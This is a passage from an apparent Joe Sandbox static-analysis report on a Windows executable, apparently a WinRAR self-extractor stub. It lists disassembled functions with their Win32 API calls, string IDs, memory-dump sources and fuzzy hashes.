                                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0045B941
                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0045B954
                                                                                                                • Part of subcall function 00458B22: GetDC.USER32(00000000), ref: 00458B2E
                                                                                                                • Part of subcall function 00458B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00458B3D
                                                                                                                • Part of subcall function 00458B22: ReleaseDC.USER32(00000000,00000000), ref: 00458B4B
                                                                                                                • Part of subcall function 00458ADF: GetDC.USER32(00000000), ref: 00458AEB
                                                                                                                • Part of subcall function 00458ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00458AFA
                                                                                                                • Part of subcall function 00458ADF: ReleaseDC.USER32(00000000,00000000), ref: 00458B08
                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0045B97B
                                                                                                              • DeleteObject.GDI32(00000000), ref: 0045B982
                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0045B98B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                                              • String ID: STATIC
                                                                                                              • API String ID: 1444658586-1882779555
                                                                                                              • Opcode ID: 79794f441e540275b62be9989efd46206ff1d348df3c22d9bdfa8346f4757a35
                                                                                                              • Instruction ID: 8be81aaf4361a45cac24b038e44b86ea86fc138677a19a1327218d876310d94b
                                                                                                              • Opcode Fuzzy Hash: 79794f441e540275b62be9989efd46206ff1d348df3c22d9bdfa8346f4757a35
                                                                                                              • Instruction Fuzzy Hash: 3B21F6B25402147BEB216B65CC4AFEF762CEF44706F004026FE05B5192CF685D998AFE
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 0046623F
                                                                                                                • Part of subcall function 004659C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?), ref: 004659D8
                                                                                                                • Part of subcall function 004659C2: GetLastError.KERNEL32(?,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?,?), ref: 004659EA
                                                                                                              • _free.LIBCMT ref: 0046624B
                                                                                                              • _free.LIBCMT ref: 00466256
                                                                                                              • _free.LIBCMT ref: 00466261
                                                                                                              • _free.LIBCMT ref: 0046626C
                                                                                                              • _free.LIBCMT ref: 00466277
                                                                                                              • _free.LIBCMT ref: 00466282
                                                                                                              • _free.LIBCMT ref: 0046628D
                                                                                                              • _free.LIBCMT ref: 00466298
                                                                                                              • _free.LIBCMT ref: 004662A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 112221927ff10c856fb14157196b75bad968b69b89454ad3097c3ff51ce7b4f6
                                                                                                              • Instruction ID: 54485b6810487401427a8fd45ab475e034fdf90974b41377795c14e39d7de38a
                                                                                                              • Opcode Fuzzy Hash: 112221927ff10c856fb14157196b75bad968b69b89454ad3097c3ff51ce7b4f6
                                                                                                              • Instruction Fuzzy Hash: 001196F5200608EFCF01EF56CC42CD93B75FF04364F4194AAB9884B222EA35DA549B85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                              • API String ID: 0-2277559157
                                                                                                              • Opcode ID: 09bafc869d74ee563659b0535c26ad72d509476ece39aa21131e070ed9cf3c3c
                                                                                                              • Instruction ID: 3ba09f180fbf65e7136be1dc91e0ace8909a1db6b55460434ca000613d585d35
                                                                                                              • Opcode Fuzzy Hash: 09bafc869d74ee563659b0535c26ad72d509476ece39aa21131e070ed9cf3c3c
                                                                                                              • Instruction Fuzzy Hash: 37F129716043409BFB14EB658995BFB7795AF90304F4804AFFC859B283CAEC9948C76E
                                                                                                              APIs
                                                                                                                • Part of subcall function 004412E7: GetDlgItem.USER32(00000000,00003021), ref: 0044132B
                                                                                                                • Part of subcall function 004412E7: SetWindowTextW.USER32(00000000,004702E4), ref: 00441341
                                                                                                              • EndDialog.USER32(?,00000001), ref: 004599AF
                                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 004599DC
                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004599F1
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00459A02
                                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00459A0B
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00459A1F
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00459A31
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                              • String ID: LICENSEDLG
                                                                                                              • API String ID: 3214253823-2177901306
                                                                                                              • Opcode ID: 9c3856f4e77e23021ca0bd13f5c9a115d0bb4c8894314e58c266165f46fd886e
                                                                                                              • Instruction ID: 3f66938f7145fed15e9e3c64fcc73c28a9864fd8df825702b30b26c231ceb224
                                                                                                              • Opcode Fuzzy Hash: 9c3856f4e77e23021ca0bd13f5c9a115d0bb4c8894314e58c266165f46fd886e
                                                                                                              • Instruction Fuzzy Hash: DC21FC71204204BBE5116B65DD85E7F3B6DEB46785F01003FFA04A22A2CB6A9C45D77F
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                              • String ID: N,F$N,F$N,F
                                                                                                              • API String ID: 1036877536-710870866
                                                                                                              • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                                              • Instruction ID: 54f5c2dd02b322d255e89348d83acabf495230a777ce20715847ccfffec81f1e
                                                                                                              • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                                              • Instruction Fuzzy Hash: D8A179719003869FD7219F28C891BAEBBA5EF11318F1641AFD4859B382E63C9C41C75A
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00449232
                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00449255
                                                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00449274
                                                                                                                • Part of subcall function 00450B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0044AC49,?,?,?,0044ABF8,?,-00000002,?,00000000,?), ref: 00450B28
                                                                                                              • _swprintf.LIBCMT ref: 00449310
                                                                                                                • Part of subcall function 00443F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00443F6E
                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00449385
                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004493C1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                              • String ID: rtmp%d
                                                                                                              • API String ID: 2111052971-3303766350
                                                                                                              • Opcode ID: ab9ff8cf8b87583dfe370eb7842519f02983eb7b950708622b6f83a7ce8bdced
                                                                                                              • Instruction ID: c7c2bea969f7c9c3c97483250f1c155239a164accd6375850c26c16085620e44
                                                                                                              • Opcode Fuzzy Hash: ab9ff8cf8b87583dfe370eb7842519f02983eb7b950708622b6f83a7ce8bdced
                                                                                                              • Instruction Fuzzy Hash: A1418D71911259A6FF20AF61CD85EDF737CAF09785F0040ABA905A3142EA389F499B68
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00458705,?), ref: 00457FBA
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00457FDB
                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00458002
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                              • API String ID: 4094277203-4209811716
                                                                                                              • Opcode ID: d68d29bf411fbcda4732f6a0990b5cd4a3501c31b7ca46945c8a2fcd8235ca36
                                                                                                              • Instruction ID: 3fe131a1f2e38dfb1e0ddcba247ed3e8f3536277bfd3b88c06e6282ed76616e7
                                                                                                              • Opcode Fuzzy Hash: d68d29bf411fbcda4732f6a0990b5cd4a3501c31b7ca46945c8a2fcd8235ca36
                                                                                                              • Instruction Fuzzy Hash: 1731F3321082017AD724AB65AC06FAB7798DF56725F10412FF915961D3EBBC990C83AE
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00457DAF
                                                                                                              • GetTickCount.KERNEL32 ref: 00457DCD
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00457DE3
                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00457DF7
                                                                                                              • TranslateMessage.USER32(?), ref: 00457E02
                                                                                                              • DispatchMessageW.USER32(?), ref: 00457E0D
                                                                                                              • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00457EBD
                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00457EC7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                                              • String ID:
                                                                                                              • API String ID: 4150546248-0
                                                                                                              • Opcode ID: 5bf94cba7259c21cd42326f1a7304430bea142e54bd59c62b006916d9a66c1f6
                                                                                                              • Instruction ID: a8428010e6e4a79e6cdaf80e218df82f2ad586fc72568bd08a7badbfea6f8df1
                                                                                                              • Opcode Fuzzy Hash: 5bf94cba7259c21cd42326f1a7304430bea142e54bd59c62b006916d9a66c1f6
                                                                                                              • Instruction Fuzzy Hash: E9415C71208306AFD710DF65D88592B7BE9EF88706B00087EFA45C7212DB75EC49CB66
                                                                                                              APIs
                                                                                                              • __aulldiv.LIBCMT ref: 0044FE33
                                                                                                                • Part of subcall function 0044A8E0: GetVersionExW.KERNEL32(?), ref: 0044A905
                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0044FE5C
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0044FE6E
                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0044FE7B
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0044FE91
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0044FE9D
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0044FED3
                                                                                                              • __aullrem.LIBCMT ref: 0044FF5D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1247370737-0
                                                                                                              • Opcode ID: 160029fda3e489a6c1263f9bb99d60f868ca46743a87f2429b83eb9c57ad7195
                                                                                                              • Instruction ID: 835114b23ef4cae7d53f4a479e471e87293c9b67c09b1befd89ed167e3adbee2
                                                                                                              • Opcode Fuzzy Hash: 160029fda3e489a6c1263f9bb99d60f868ca46743a87f2429b83eb9c57ad7195
                                                                                                              • Instruction Fuzzy Hash: 604104B2408305AFD310DF65C8809ABBBE8FB88714F404A2FF59692650E739E549DB5A
                                                                                                              APIs
                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0046CCE2,00000000,00000000,00000000,00000000,00000000,?), ref: 0046C5AF
                                                                                                              • __fassign.LIBCMT ref: 0046C62A
                                                                                                              • __fassign.LIBCMT ref: 0046C645
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0046C66B
                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0046CCE2,00000000,?,?,?,?,?,?,?,?,?,0046CCE2,00000000), ref: 0046C68A
                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,0046CCE2,00000000,?,?,?,?,?,?,?,?,?,0046CCE2,00000000), ref: 0046C6C3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 1324828854-0
                                                                                                              • Opcode ID: f77e65a551762d443bede909061f16f7e287b2245dc4d2bf652491d915b378fa
                                                                                                              • Instruction ID: 49a8bd6dab1b49c8cde49dd31d45b42f8f825624f8fbb5932c103bf2de073a80
                                                                                                              • Opcode Fuzzy Hash: f77e65a551762d443bede909061f16f7e287b2245dc4d2bf652491d915b378fa
                                                                                                              • Instruction Fuzzy Hash: 7D51A2B1A002499FCB10CFA8D885AEEBBF4FF19310F14416BE595E7251E7349941CBAA
                                                                                                              APIs
                                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0045B0EF
                                                                                                              • _swprintf.LIBCMT ref: 0045B123
                                                                                                                • Part of subcall function 00443F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00443F6E
                                                                                                              • SetDlgItemTextW.USER32(?,00000066,00483122), ref: 0045B143
                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0045B176
                                                                                                              • EndDialog.USER32(?,00000001), ref: 0045B257
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                              • String ID: %s%s%u
                                                                                                              • API String ID: 2892007947-1360425832
                                                                                                              • Opcode ID: d785eb0cf92b3e69e0fc7453a8f57ac201a0003de305e695cd02f3eb1765ffe3
                                                                                                              • Instruction ID: 111a36c0ab5467d945d3c34991b82c33d2cdf225fd630f3709333af033656c11
                                                                                                              • Opcode Fuzzy Hash: d785eb0cf92b3e69e0fc7453a8f57ac201a0003de305e695cd02f3eb1765ffe3
                                                                                                              • Instruction Fuzzy Hash: 84417371900619AEEF65DB60CC85EDF77BCEB04745F0040ABF808D6152EB789A888F99
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                                              • String ID: %08x
                                                                                                              • API String ID: 1593746830-3682738293
                                                                                                              • Opcode ID: 7c05d86d08fa9b18b846814b1c161ca7e6814ffa4a9ea8ccf2a6394e90054b5d
                                                                                                              • Instruction ID: 683d2f9d6fbffeb812f580034efe23ba6bc360c9dbfe6110a5d6a007027816fa
                                                                                                              • Opcode Fuzzy Hash: 7c05d86d08fa9b18b846814b1c161ca7e6814ffa4a9ea8ccf2a6394e90054b5d
                                                                                                              • Instruction Fuzzy Hash: 9E41F872906344AAF730A625CC85BFB73DCDB85714F18052FF948A7282E67C9D05C2AA
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004585B5
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004585DA
                                                                                                              • ShowWindow.USER32(?,00000005,?), ref: 00458671
                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00458679
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 0045868F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Show$RectText
                                                                                                              • String ID: RarHtmlClassName
                                                                                                              • API String ID: 3937224194-1658105358
                                                                                                              • Opcode ID: e885678f02a4f6a67bfa195816531f4147742b4e61ea7d8079af433425a6019c
                                                                                                              • Instruction ID: f741f2500d141a6565d7afa832bb512903bc20f76759bc26583e0bcf4547c122
                                                                                                              • Opcode Fuzzy Hash: e885678f02a4f6a67bfa195816531f4147742b4e61ea7d8079af433425a6019c
                                                                                                              • Instruction Fuzzy Hash: 6231A331104304EFC7119F649D49B1FBBA9FF88702F00446AFE49AA252DF74E954CBAA
                                                                                                              APIs
                                                                                                                • Part of subcall function 004692D3: _free.LIBCMT ref: 004692FC
                                                                                                              • _free.LIBCMT ref: 0046935D
                                                                                                                • Part of subcall function 004659C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?), ref: 004659D8
                                                                                                                • Part of subcall function 004659C2: GetLastError.KERNEL32(?,?,00469301,?,00000000,?,00000000,?,00469328,?,00000007,?,?,00469725,?,?), ref: 004659EA
                                                                                                              • _free.LIBCMT ref: 00469368
                                                                                                              • _free.LIBCMT ref: 00469373
                                                                                                              • _free.LIBCMT ref: 004693C7
                                                                                                              • _free.LIBCMT ref: 004693D2
                                                                                                              • _free.LIBCMT ref: 004693DD
                                                                                                              • _free.LIBCMT ref: 004693E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                                              • Instruction ID: 575b433043515b848768107031f92ea3ccf018c33a0e15e915bc545732c165e5
                                                                                                              • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                                              • Instruction Fuzzy Hash: C51130B1941B04F6D920BB72CC07FCB77EC6F04718F444C1FB299A6192EAB9B9084656
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,00460C0B,0045E662), ref: 00460C22
                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00460C30
                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00460C49
